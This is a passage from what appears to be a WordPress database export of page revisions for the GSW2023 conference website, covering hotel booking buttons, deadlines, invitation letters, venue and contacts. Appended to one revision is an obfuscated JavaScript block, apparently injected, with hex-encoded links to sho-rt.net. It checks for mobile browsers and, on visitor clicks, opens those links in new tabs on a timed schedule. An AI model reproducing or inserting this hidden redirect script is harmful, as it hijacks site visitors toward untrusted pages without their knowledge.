link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 00:04:29','2023-06-24 00:04:29','',3066,'https://gsw2023.com/?p=4768',0,'revision','',0),
(4769,1,'2023-06-24 00:10:05','2023-06-24 00:10:05','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe><br />\n<a href=\"https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17\" target=\"_blank\" rel=\"noopener\">https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17</a>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" 